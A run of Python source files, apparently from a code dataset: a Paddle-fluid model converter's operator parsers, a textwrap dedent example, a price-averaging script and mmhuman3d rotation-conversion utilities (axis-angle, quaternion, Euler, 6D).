beta = helper.np_param(op, 'Bias')
eps = helper.attr_data(op, 'epsilon')
var = np.sqrt(var + eps)
np_scale = alpha / var
np_bias = beta - (alpha * mean / var)
np_scale_shape = map(int, [1]*(4-len(np_scale.shape)) + list(np_scale.shape))
np_bias_shape = map(int, [1]*(4-len(np_bias.shape)) + list(np_bias.shape))
np_scale_tensor = helper.create_tensor(list(np_scale.flatten()), np_scale_shape, FLOAT)
np_bias_tensor = helper.create_tensor(list(np_bias.flatten()), np_bias_shape, FLOAT)
OpsRegister()["Scale"].bias_term = True
OpsRegister()["Scale"].weight_1 = np_scale_tensor
OpsRegister()["Scale"].weight_2 = np_bias_tensor
OpsRegister()["Scale"].axis = 1
OpsRegister()["Scale"].num_axes = 1
@ParserFeedDecorator("Scale")
def Parser_scale_of_bn(args):
op = args[1]
helper = args[3]
OpsRegister()["Scale"].weight_1 = helper.param_tensor(op, 'Scale')
OpsRegister()["Scale"].axis = 1
OpsRegister()["Scale"].num_axes = 1
has_bias = helper.is_persistable_param(op, 'Bias')
if has_bias is True:
OpsRegister()["Scale"].bias_term = True
OpsRegister()["Scale"].weight_2 = helper.param_tensor(op, 'Bias')
else:
OpsRegister()["Scale"].bias_term = False
@ParserFeedDecorator("Split")
def Parser_split(args):
private_data = args[4]
split_num = private_data['split_num']
OpsRegister()["Split"].split_num = split_num
@ParserFeedDecorator("Reshape") # NMT
def Parser_reshape(args):
op = args[1]
helper = args[3]
private_data = args[4]
if 'new_shape' in private_data.keys():
shape = private_data['new_shape']
else:
shape = helper.attr_data(op, 'shape')
shape = map(int, shape + [1] * (4 - len(shape)))
OpsRegister()["Reshape"].dims = shape
@ParserFeedDecorator("Concat")
def Parser_concat(args):
op = args[1]
helper = args[3]
OpsRegister()["Concat"].axis = helper.attr_data(op, 'axis')
@ParserFeedDecorator("Concat")
def Parser_concat_btw_priorbox_boxcoder(args):
op = args[1]
helper = args[3]
OpsRegister()["Concat"].axis = 3
@ParserFeedDecorator("Permute")
def Parser_transpose(args):
op = args[1]
helper = args[3]
fluid_dims = helper.attr_data(op, 'axis')
n = 4 - len(fluid_dims)
dims = range(0, n)
tail_dims = [i + n for i in fluid_dims]
dims.extend(tail_dims)
OpsRegister()["Permute"].dims = dims
########## SSD Model ##########
@ParserFeedDecorator("PriorBox")
def Parser_prior_box(args):
op = args[1]
helper = args[3]
OpsRegister()["PriorBox"].min_size = helper.attr_data(op, 'min_sizes')
OpsRegister()["PriorBox"].max_size = helper.attr_data(op, 'max_sizes')
OpsRegister()["PriorBox"].aspect_ratio = helper.attr_data(op, 'aspect_ratios')
OpsRegister()["PriorBox"].is_flip = helper.attr_data(op, 'flip')
OpsRegister()["PriorBox"].is_clip = helper.attr_data(op, 'clip')
OpsRegister()["PriorBox"].variance = helper.attr_data(op, 'variances')
OpsRegister()["PriorBox"].img_h = 0
OpsRegister()["PriorBox"].img_w = 0
OpsRegister()["PriorBox"].step_h = helper.attr_data(op, 'step_h')
OpsRegister()["PriorBox"].step_w = helper.attr_data(op, 'step_w')
OpsRegister()["PriorBox"].offset = helper.attr_data(op, 'offset')
OpsRegister()["PriorBox"].order = ['MIN', 'COM', 'MAX']
@ParserFeedDecorator("box_coder")
def Parser_box_coder(args):
pass
@ParserFeedDecorator("DetectionOutput")
def Parser_multiclass_nms(args):
op = args[1]
helper = args[3]
private_data = args[4]
OpsRegister()["DetectionOutput"].share_location = True
OpsRegister()["DetectionOutput"].variance_encode_in_target = False
OpsRegister()["DetectionOutput"].class_num = 0
OpsRegister()["DetectionOutput"].background_id = helper.attr_data(op, 'background_label')
OpsRegister()["DetectionOutput"].keep_top_k = helper.attr_data(op, 'keep_top_k')
OpsRegister()["DetectionOutput"].conf_thresh = helper.attr_data(op, 'score_threshold')
OpsRegister()["DetectionOutput"].nms_top_k = helper.attr_data(op, 'nms_top_k')
OpsRegister()["DetectionOutput"].nms_thresh = helper.attr_data(op, 'nms_threshold')
OpsRegister()["DetectionOutput"].nms_eta = helper.attr_data(op, 'nms_eta')
if 'code_type' in private_data.keys():
if private_data['code_type'] == 'decode_center_size':
OpsRegister()["DetectionOutput"].code_type = "CENTER_SIZE"
else:
OpsRegister()["DetectionOutput"].code_type = "CORNER"
########## VIS Model ##########
@ParserFeedDecorator("Im2Sequence")
def Parser_im2sequence(args):
op = args[1]
helper = args[3]
OpsRegister()["Im2Sequence"].paddings = helper.attr_data(op, 'paddings')
OpsRegister()["Im2Sequence"].strides = helper.attr_data(op, 'strides')
OpsRegister()["Im2Sequence"].window_size = helper.attr_data(op, 'kernels')
OpsRegister()["Im2Sequence"].dilations = helper.attr_data(op, 'dilations', [1, 1])
@ParserFeedDecorator("Cast")
def Parser_cast(args):
op = args[1]
helper = args[3]
OpsRegister()["Cast"].in_type = helper.attr_data(op, 'in_dtype')
OpsRegister()["Cast"].out_type = helper.attr_data(op, 'out_dtype')
@ParserFeedDecorator("Argmax") # new256
def Parser_top_k(args):
op = args[1]
helper = args[3]
OpsRegister()["Argmax"].out_max_val = True
OpsRegister()["Argmax"].top_k = helper.attr_data(op, 'k')
OpsRegister()["Argmax"].axis_term = False
@ParserFeedDecorator("CtcAlign")
def Parser_ctc_align(args):
op = args[1]
helper = args[3]
OpsRegister()["CtcAlign"].merge_repeated = helper.attr_data(op, 'merge_repeated')
OpsRegister()["CtcAlign"].blank = helper.attr_data(op, 'blank')
@ParserFeedDecorator("Eltwise")
def Parser_sum(args):
OpsRegister()["Eltwise"].type = "Add"
OpsRegister()["Eltwise"].coeff = [1.0, 1.0]
@ParserFeedDecorator("LRN")
def Parser_lrn(args):
op = args[1]
helper = args[3]
OpsRegister()["LRN"].local_size = helper.attr_data(op, 'n')
OpsRegister()["LRN"].alpha = helper.attr_data(op, 'alpha')
OpsRegister()["LRN"].beta = helper.attr_data(op, 'beta')
OpsRegister()["LRN"].norm_region = "ACROSS_CHANNELS"
OpsRegister()["LRN"].k = helper.attr_data(op, 'k')
@ParserFeedDecorator("Gru")
def Parser_gru(args):
op = args[1]
helper = args[3]
private_data = args[4]
OpsRegister()["Gru"].is_reverse = helper.attr_data(op, 'is_reverse')
OpsRegister()["Gru"].gate_activation = helper.attr_data(op, 'gate_activation') + '_fluid'
OpsRegister()["Gru"].activation = helper.attr_data(op, 'activation') + '_fluid'
OpsRegister()["Gru"].gru_formula = "gru_origin"
if bool(private_data) is True:
ori_bx = private_data['np_bias_x']
ori_bh = helper.np_param(op, 'Bias')
ori_b = ori_bx + ori_bh
ori_wx = private_data['np_weight_x']
ori_wh = helper.np_param(op, 'Weight')
new_tensors = helper.gru_tensor_convert(ori_wh, ori_wx, ori_b)
weights = []
for tensor in new_tensors:
weights.append(helper.create_tensor(list(tensor.flatten()), list(np.shape(tensor)), FLOAT))
OpsRegister()["Gru"].weight_1 = weights[0]
OpsRegister()["Gru"].weight_2 = weights[1]
else:
OpsRegister()["Gru"].weight_1 = helper.param_tensor(op, 'Weight')
OpsRegister()["Gru"].weight_2 = helper.create_tensor([0], [-1], FLOAT)
@ParserFeedDecorator("LSTM")
def Parser_lstm(args):
op = args[1]
helper = args[3]
private_data = args[4]
OpsRegister()["LSTM"].candidate_activation = helper.attr_data(op, 'candidate_activation')
OpsRegister()["LSTM"].cell_activation = helper.attr_data(op, 'cell_activation')
OpsRegister()["LSTM"].gate_activation = helper.attr_data(op, 'gate_activation')
OpsRegister()["LSTM"].is_reverse = helper.attr_data(op, 'is_reverse')
OpsRegister()["LSTM"].use_peepholes = helper.attr_data(op, 'use_peepholes')
OpsRegister()["LSTM"].num_direction = 1
OpsRegister()["LSTM"].dropout_param = 1.0
OpsRegister()["LSTM"].num_layers = 1
OpsRegister()["LSTM"].input_activation = "null"
if bool(private_data) is True:
np_fc_bias = private_data['np_flat_fc_bias']
np_fc_weight = private_data['np_flat_fc_weight']
np_fc_outdim = private_data['np_fc_outdim']
np_lstm_bias = helper.np_param(op, 'Bias')
np_lstm_weight = helper.np_param(op, 'Weight')
np_tensors = helper.lstm_fc_tensor_merge_convert(np_fc_outdim, np_lstm_weight, \
np_lstm_bias, np_fc_weight, np_fc_bias)
np_weight = np_tensors[0]
np_bias = np_tensors[1]
        # list() keeps the shapes concrete (map() is lazy under Python 3)
        np_weight_shape = list(map(int, [1]*(4-len(np_weight.shape)) + list(np_weight.shape)))
        np_bias_shape = list(map(int, [1]*(4-len(np_bias.shape)) + list(np_bias.shape)))
np_weight_tensor = helper.create_tensor(list(np_weight.flatten()), np_weight_shape, FLOAT)
np_bias_tensor = helper.create_tensor(list(np_bias.flatten()), np_bias_shape, FLOAT)
OpsRegister()["LSTM"].weight_1 = np_weight_tensor
OpsRegister()["LSTM"].weight_2 = np_bias_tensor
else:
OpsRegister()["LSTM"].weight_1 = helper.param_tensor(op, 'Weight')
OpsRegister()["LSTM"].weight_2 = helper.create_tensor([0], [-1], FLOAT)
############### RNN ###############
@ParserFeedDecorator("Embedding")
def Parser_lookup_table(args):
op = args[1]
helper = args[3]
[weights_tensor, weights_shape] = helper.param_tensor_sh(op, 'W')
OpsRegister()["Embedding"].weight_1 = weights_tensor
OpsRegister()["Embedding"].padding_idx = helper.attr_data(op, 'padding_idx')
OpsRegister()["Embedding"].word_num = weights_shape[2]
OpsRegister()["Embedding"].emb_dim = weights_shape[3]
@ParserFeedDecorator("SequencePool")
def Parser_sequence_pool(args):
op = args[1]
helper = args[3]
OpsRegister()["SequencePool"].pooltype = helper.attr_data(op, 'pooltype')
@ParserFeedDecorator("Activation")
def Parser_tanh(args):
OpsRegister()["Activation"].type = "TanH"
@ParserFeedDecorator("SequenceConv")
def Parser_sequence_conv(args):
op = args[1]
helper = args[3]
private_data = args[4]
[weights_tensor, weights_shape] = helper.param_tensor_sh(op, 'Filter')
OpsRegister()["SequenceConv"].weight_1 = weights_tensor
OpsRegister()["SequenceConv"].filter_num = weights_shape[0]
OpsRegister()["SequenceConv"].kernel_size = weights_shape[-2:]
OpsRegister()["SequenceConv"].padding_trainable = helper.attr_data(op, 'paddingTrainable')
OpsRegister()["SequenceConv"].context_stride = helper.attr_data(op, 'contextStride')
OpsRegister()["SequenceConv"].context_start = helper.attr_data(op, 'contextStart')
OpsRegister()["SequenceConv"].context_length = helper.attr_data(op, 'contextLength')
if 'bias' in private_data.keys():
OpsRegister()["SequenceConv"].bias_term = True
OpsRegister()["SequenceConv"].weight_2 = private_data['bias']
else:
OpsRegister()["SequenceConv"].bias_term = False
@ParserFeedDecorator("CrfDecoding")
def Parser_crf_decoding(args):
op = args[1]
helper = args[3]
[weights_tensor, weights_shape] = helper.param_tensor_sh(op, 'Transition')
OpsRegister()["CrfDecoding"].weight_1 = weights_tensor
@ParserFeedDecorator("MatMul")
def Parser_matmul(args):
op = args[1]
helper = args[3]
private_data = args[4]
if 'coeff' in private_data.keys():
coeff = private_data['coeff']
else:
coeff = 1.0
OpsRegister()["MatMul"].transpose_x = helper.attr_data(op, 'transpose_X')
OpsRegister()["MatMul"].transpose_y = helper.attr_data(op, 'transpose_Y')
OpsRegister()["MatMul"].coeff = coeff
@ParserFeedDecorator("Scale")
def Parser_scale(args):
op = args[1]
helper = args[3]
scale_val = helper.attr_data(op, 'scale')
OpsRegister()["Scale"].axis = 0
OpsRegister()["Scale"].num_axes = 0
OpsRegister()["Scale"].bias_term = False
OpsRegister()["Scale"].weight_1 = helper.create_tensor([scale_val], [1, 1, 1, 1], FLOAT)
@ParserFeedDecorator("LayerNorm")
def Parser_layer_norm(args):
op = args[1]
helper = args[3]
OpsRegister()["LayerNorm"].weight_1 = helper.param_tensor(op, 'Scale')
OpsRegister()["LayerNorm"].weight_2 = helper.param_tensor(op, 'Bias')
OpsRegister()["LayerNorm"].begin_norm_axis = helper.attr_data(op, 'begin_norm_axis')
OpsRegister()["LayerNorm"].eps = helper.attr_data(op, 'epsilon')
@ParserFeedDecorator("Scale")
def Parser_dropout(args):
op = args[1]
helper = args[3]
scale_val = 1 - helper.attr_data(op, 'dropout_prob')
OpsRegister()["Scale"].axis = 0
OpsRegister()["Scale"].num_axes = 0
OpsRegister()["Scale"].bias_term = False
OpsRegister()["Scale"].weight_1 = helper.create_tensor([scale_val], [1, 1, 1, 1], FLOAT)
@ParserFeedDecorator("Scale")
def Parser_elementwise_mul(args):
op = args[1]
helper = args[3]
private_data = args[4]
OpsRegister()["Scale"].weight_1 = helper.param_tensor(op, 'Y')
OpsRegister()["Scale"].axis = helper.attr_data(op, 'axis')
OpsRegister()["Scale"].num_axes = 1
if 'bias' in private_data.keys():
OpsRegister()["Scale"].bias_term = True
OpsRegister()["Scale"].weight_2 = private_data['bias']
else:
OpsRegister()["Scale"].bias_term = False
FLUID_NODE_FILLER = {
"feed":OpsParam().set_parser(Parser_feed),
"conv2d":OpsParam().set_parser(Parser_conv2d),
"elementwise_add":OpsParam().set_parser(Parser_sum),
"relu":OpsParam().set_parser(Parser_relu),
"pool2d":OpsParam().set_parser(Parser_pool2d),
"mul":OpsParam().set_parser(Parser_mul),
"softmax":OpsParam().set_parser(Parser_softmax),
"sigmoid":OpsParam().set_parser(Parser_sigmoid),
"axpy":OpsParam().set_parser(Parser_axpy),
"batch_norm":OpsParam().set_parser(Parser_batch_norm),
"disc_bn":OpsParam().set_parser(Parser_scale_disc_bn),
"scale_of_bn":OpsParam().set_parser(Parser_scale_of_bn),
"elementwise_mul":OpsParam().set_parser(Parser_elementwise_mul),
"split":OpsParam().set_parser(Parser_split),
"depthwise_conv2d":OpsParam().set_parser(Parser_conv2d),
"reshape":OpsParam().set_parser(Parser_reshape),
"concat":OpsParam().set_parser(Parser_concat),
"transpose":OpsParam().set_parser(Parser_transpose),
"prior_box":OpsParam().set_parser(Parser_prior_box),
"box_coder":OpsParam().set_parser(Parser_box_coder),
"multiclass_nms":OpsParam().set_parser(Parser_multiclass_nms),
"concat_btw_priorbox_boxcoder":OpsParam().set_parser(Parser_concat_btw_priorbox_boxcoder),
"im2sequence":OpsParam().set_parser(Parser_im2sequence),
"gru":OpsParam().set_parser(Parser_gru),
"sum":OpsParam().set_parser(Parser_sum),
"lrn":OpsParam().set_parser(Parser_lrn),
"top_k":OpsParam().set_parser(Parser_top_k),
"ctc_align":OpsParam().set_parser(Parser_ctc_align),
"cast":OpsParam().set_parser(Parser_cast),
"lookup_table":OpsParam().set_parser(Parser_lookup_table),
"sequence_pool":OpsParam().set_parser(Parser_sequence_pool),
"tanh":OpsParam().set_parser(Parser_tanh),
"sequence_conv":OpsParam().set_parser(Parser_sequence_conv),
"crf_decoding":OpsParam().set_parser(Parser_crf_decoding),
"lstm":OpsParam().set_parser(Parser_lstm),
"matmul":OpsParam().set_parser(Parser_matmul),
"layer_norm":OpsParam().set_parser(Parser_layer_norm),
"dropout":OpsParam().set_parser(Parser_dropout),
"scale":OpsParam().set_parser(Parser_scale),
}
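# Illustrative sketch (not part of the original converter): the table above is a
# plain dispatch registry, so a fluid op is handled roughly like this (the names
# below are hypothetical placeholders for the framework's real call site):
#     ops_param = FLUID_NODE_FILLER['conv2d']   # OpsParam configured via set_parser()
#     ops_param.parser(args)                    # would run Parser_conv2d on this op's args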
| 37.95723
| 94
| 0.729302
|
5973917957b294f7a2b5ddd0a791cc8b4c57c1d1
| 291
|
py
|
Python
|
lang/py/pylib/code/textwrap/textwrap_dedent.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | 13
|
2020-01-04T07:37:38.000Z
|
2021-08-31T05:19:58.000Z
|
lang/py/pylib/code/textwrap/textwrap_dedent.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | 3
|
2020-06-05T22:42:53.000Z
|
2020-08-24T07:18:54.000Z
|
lang/py/pylib/code/textwrap/textwrap_dedent.py
|
ch1huizong/learning
|
632267634a9fd84a5f5116de09ff1e2681a6cc85
|
[
"MIT"
] | 9
|
2020-10-19T04:53:06.000Z
|
2021-08-31T05:20:01.000Z
|
#!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2008 Doug Hellmann All rights reserved.
#
"""
"""
__version__ = "$Id$"
#end_pymotw_header
import textwrap
from textwrap_example import sample_text
dedented_text = textwrap.dedent(sample_text)
print('Dedented:')
print(dedented_text)
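# Illustrative note (not part of the original PyMOTW example): dedent() strips the
# longest whitespace prefix common to all lines, so
#     textwrap.dedent("    a\n    b\n      c\n")
# evaluates to "a\nb\n  c\n" -- the shared 4-space prefix is removed while the
# extra indentation of the third line is kept.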
| 16.166667
| 55
| 0.756014
|
92c104d45a7b0db492e61c7cf4bf10a2f5c21f2f
| 309
|
py
|
Python
|
Chapter 08/2/8.py
|
icaksh/Python-Projects-Protek
|
dfd56ea5afc637a8850911a9296131652de383c5
|
[
"MIT"
] | null | null | null |
Chapter 08/2/8.py
|
icaksh/Python-Projects-Protek
|
dfd56ea5afc637a8850911a9296131652de383c5
|
[
"MIT"
] | null | null | null |
Chapter 08/2/8.py
|
icaksh/Python-Projects-Protek
|
dfd56ea5afc637a8850911a9296131652de383c5
|
[
"MIT"
] | null | null | null |
def averageHarga(x):
listHarga = list(x.values())
jumlahan = 0
pembagi = 0
for i in listHarga:
jumlahan = jumlahan + i
pembagi += 1
average = jumlahan/pembagi
return average
buah ={'apel' : 5000, 'jeruk' : 8500, 'mangga' : 7800, 'duku' :6500}
print(averageHarga(buah))
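# Worked check (added for illustration, not in the original script):
# (5000 + 8500 + 7800 + 6500) / 4 = 27800 / 4 = 6950.0, so the line above prints 6950.0.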
| 25.75
| 68
| 0.608414
|
5a89bf13cc351a70fd38fca01ab09e23be272127
| 20,638
|
py
|
Python
|
mmhuman3d/utils/transforms.py
|
ykk648/mmhuman3d
|
26af92bcf6abbe1855e1a8a48308621410f9c047
|
[
"Apache-2.0"
] | 472
|
2021-12-03T03:12:55.000Z
|
2022-03-31T01:33:13.000Z
|
mmhuman3d/utils/transforms.py
|
ykk648/mmhuman3d
|
26af92bcf6abbe1855e1a8a48308621410f9c047
|
[
"Apache-2.0"
] | 127
|
2021-12-03T05:00:14.000Z
|
2022-03-31T13:47:33.000Z
|
mmhuman3d/utils/transforms.py
|
ykk648/mmhuman3d
|
26af92bcf6abbe1855e1a8a48308621410f9c047
|
[
"Apache-2.0"
] | 37
|
2021-12-03T03:23:22.000Z
|
2022-03-31T08:41:58.000Z
|
from typing import Union
import numpy
import torch
from pytorch3d.transforms import (
axis_angle_to_matrix,
axis_angle_to_quaternion,
euler_angles_to_matrix,
matrix_to_euler_angles,
matrix_to_quaternion,
matrix_to_rotation_6d,
quaternion_to_axis_angle,
quaternion_to_matrix,
rotation_6d_to_matrix,
)
from mmhuman3d.core.conventions.joints_mapping.standard_joint_angles import (
TRANSFORMATION_AA_TO_SJA,
TRANSFORMATION_SJA_TO_AA,
)
class Compose:
def __init__(self, transforms: list):
"""Composes several transforms together. This transform does not
support torchscript.
Args:
transforms (list): (list of transform functions)
"""
self.transforms = transforms
def __call__(self,
rotation: Union[torch.Tensor, numpy.ndarray],
convention: str = 'xyz',
**kwargs):
convention = convention.lower()
if not (set(convention) == set('xyz') and len(convention) == 3):
raise ValueError(f'Invalid convention {convention}.')
if isinstance(rotation, numpy.ndarray):
data_type = 'numpy'
rotation = torch.FloatTensor(rotation)
elif isinstance(rotation, torch.Tensor):
data_type = 'tensor'
else:
raise TypeError(
'Type of rotation should be torch.Tensor or numpy.ndarray')
for t in self.transforms:
if 'convention' in t.__code__.co_varnames:
rotation = t(rotation, convention.upper(), **kwargs)
else:
rotation = t(rotation, **kwargs)
if data_type == 'numpy':
rotation = rotation.detach().cpu().numpy()
return rotation
def aa_to_rotmat(
axis_angle: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""
    Convert axis_angle to rotation matrices.
Args:
axis_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3, 3).
"""
if axis_angle.shape[-1] != 3:
raise ValueError(
            f'Invalid input axis angles shape {axis_angle.shape}.')
t = Compose([axis_angle_to_matrix])
return t(axis_angle)
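# Illustrative usage sketch (not part of mmhuman3d): every converter in this module
# accepts either a numpy array or a torch tensor and returns the same type, e.g.
#     aa = numpy.zeros((10, 3))    # ten zero axis-angle rotations
#     mats = aa_to_rotmat(aa)      # numpy array of shape (10, 3, 3), all identity matrices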
def aa_to_quat(
axis_angle: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""
Convert axis_angle to quaternions.
Args:
axis_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 4).
"""
if axis_angle.shape[-1] != 3:
        raise ValueError(f'Invalid input axis angles {axis_angle.shape}.')
t = Compose([axis_angle_to_quaternion])
return t(axis_angle)
def ee_to_rotmat(euler_angle: Union[torch.Tensor, numpy.ndarray],
convention='xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert euler angle to rotation matrixs.
Args:
euler_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3, 3).
"""
if euler_angle.shape[-1] != 3:
raise ValueError(
            f'Invalid input euler angles shape {euler_angle.shape}.')
t = Compose([euler_angles_to_matrix])
return t(euler_angle, convention.upper())
def rotmat_to_ee(
matrix: Union[torch.Tensor, numpy.ndarray],
convention: str = 'xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation matrixs to euler angle.
Args:
matrix (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3, 3). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
if matrix.shape[-1] != 3 or matrix.shape[-2] != 3:
        raise ValueError(f'Invalid rotation matrix shape {matrix.shape}.')
t = Compose([matrix_to_euler_angles])
return t(matrix, convention.upper())
def rotmat_to_quat(
matrix: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation matrixs to quaternions.
Args:
matrix (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3, 3). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 4).
"""
if matrix.shape[-1] != 3 or matrix.shape[-2] != 3:
        raise ValueError(f'Invalid rotation matrix shape {matrix.shape}.')
t = Compose([matrix_to_quaternion])
return t(matrix)
def rotmat_to_rot6d(
matrix: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation matrixs to rotation 6d representations.
Args:
matrix (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3, 3). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 6).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if matrix.shape[-1] != 3 or matrix.shape[-2] != 3:
        raise ValueError(f'Invalid rotation matrix shape {matrix.shape}.')
t = Compose([matrix_to_rotation_6d])
return t(matrix)
def quat_to_aa(
quaternions: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert quaternions to axis angles.
Args:
quaternions (Union[torch.Tensor, numpy.ndarray]): input shape
            should be (..., 4). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
if quaternions.shape[-1] != 4:
        raise ValueError(f'Invalid input quaternions {quaternions.shape}.')
t = Compose([quaternion_to_axis_angle])
return t(quaternions)
def quat_to_rotmat(
quaternions: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert quaternions to rotation matrixs.
Args:
quaternions (Union[torch.Tensor, numpy.ndarray]): input shape
            should be (..., 4). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3, 3).
"""
if quaternions.shape[-1] != 4:
raise ValueError(
            f'Invalid input quaternions shape {quaternions.shape}.')
t = Compose([quaternion_to_matrix])
return t(quaternions)
def rot6d_to_rotmat(
rotation_6d: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation 6d representations to rotation matrixs.
Args:
rotation_6d (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 6). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3, 3).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if rotation_6d.shape[-1] != 6:
        raise ValueError(f'Invalid input rotation_6d {rotation_6d.shape}.')
t = Compose([rotation_6d_to_matrix])
return t(rotation_6d)
def aa_to_ee(axis_angle: Union[torch.Tensor, numpy.ndarray],
convention: str = 'xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert axis angles to euler angle.
Args:
axis_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
if axis_angle.shape[-1] != 3:
raise ValueError(
            f'Invalid input axis_angle shape {axis_angle.shape}.')
t = Compose([axis_angle_to_matrix, matrix_to_euler_angles])
return t(axis_angle, convention)
def aa_to_rot6d(
axis_angle: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert axis angles to rotation 6d representations.
Args:
axis_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 6).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if axis_angle.shape[-1] != 3:
        raise ValueError(f'Invalid input axis_angle {axis_angle.shape}.')
t = Compose([axis_angle_to_matrix, matrix_to_rotation_6d])
return t(axis_angle)
def ee_to_aa(euler_angle: Union[torch.Tensor, numpy.ndarray],
convention: str = 'xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert euler angles to axis angles.
Args:
euler_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
if euler_angle.shape[-1] != 3:
        raise ValueError(f'Invalid input euler_angle {euler_angle.shape}.')
t = Compose([
euler_angles_to_matrix, matrix_to_quaternion, quaternion_to_axis_angle
])
return t(euler_angle, convention)
def ee_to_quat(euler_angle: Union[torch.Tensor, numpy.ndarray],
convention='xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert euler angles to quaternions.
Args:
euler_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 4).
"""
if euler_angle.shape[-1] != 3:
        raise ValueError(f'Invalid input euler_angle {euler_angle.shape}.')
t = Compose([euler_angles_to_matrix, matrix_to_quaternion])
return t(euler_angle, convention)
def ee_to_rot6d(euler_angle: Union[torch.Tensor, numpy.ndarray],
convention='xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert euler angles to rotation 6d representation.
Args:
euler_angle (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
from {“x”, “y”, and “z”}. Defaults to 'xyz'.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 6).
[1] Zhou, Y., Barnes, C., Lu, J., Yang, J., & Li, H.
On the Continuity of Rotation Representations in Neural Networks.
IEEE Conference on Computer Vision and Pattern Recognition, 2019.
Retrieved from http://arxiv.org/abs/1812.07035
"""
if euler_angle.shape[-1] != 3:
        raise ValueError(f'Invalid input euler_angle {euler_angle.shape}.')
t = Compose([euler_angles_to_matrix, matrix_to_rotation_6d])
return t(euler_angle, convention)
def rotmat_to_aa(
matrix: Union[torch.Tensor, numpy.ndarray]
) -> Union[torch.Tensor, numpy.ndarray]:
"""Convert rotation matrixs to axis angles.
Args:
matrix (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 3, 3). ndim of input is unlimited.
Returns:
Union[torch.Tensor, numpy.ndarray]: shape would be (..., 3).
"""
if matrix.shape[-1] != 3 or matrix.shape[-2] != 3:
        raise ValueError(f'Invalid rotation matrix shape {matrix.shape}.')
t = Compose([matrix_to_quaternion, quaternion_to_axis_angle])
return t(matrix)
def quat_to_ee(quaternions: Union[torch.Tensor, numpy.ndarray],
convention: str = 'xyz') -> Union[torch.Tensor, numpy.ndarray]:
"""Convert quaternions to euler angles.
Args:
quaternions (Union[torch.Tensor, numpy.ndarray]): input shape
should be (..., 4). ndim of input is unlimited.
convention (str, optional): Convention string of three letters
